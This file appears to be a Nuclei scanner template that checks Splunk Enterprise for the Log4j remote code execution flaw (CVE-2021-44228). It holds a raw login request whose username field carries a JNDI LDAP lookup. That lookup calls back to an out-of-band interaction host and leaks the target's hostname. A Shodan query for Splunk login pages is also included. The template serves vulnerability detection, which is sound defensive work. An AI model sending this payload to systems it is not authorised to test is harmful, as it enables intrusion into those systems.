id: splunk-enterprise-log4j-rce info: name: Splunk Enterprise - Remote Code Execution (Apache Log4j) author: shaikhyaser severity: critical description: | Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape. reference: - https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: max-request: 1 shodan-query: http.title:"Login - Splunk" tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' str: "{{rand_base(5)}}" http: - raw: - | POST /en-US/account/login HTTP/1.1 Host: {{Hostname}} Accept: text/javascript, text/html, application/xml, text/xml, / X-Requested-With: XMLHttpRequest Origin: {{RootURL}} Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&return_to=%2Fen-US%2F matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' extractors: - type: kval kval: - interactsh_ip - type: regex part: interactsh_request group: 2 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - type: regex part: interactsh_request group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # digest: 490a004630440220710929465f8a77ba76bd194093d158488b54954b4cbbeb2494fa76f18edd861802203d0bc07faaf77ec5f71f05b8124d0e477e5b07f9b9d3c43e9ea2f23662f65e23:922c64590222798bb761d5b6d8e72950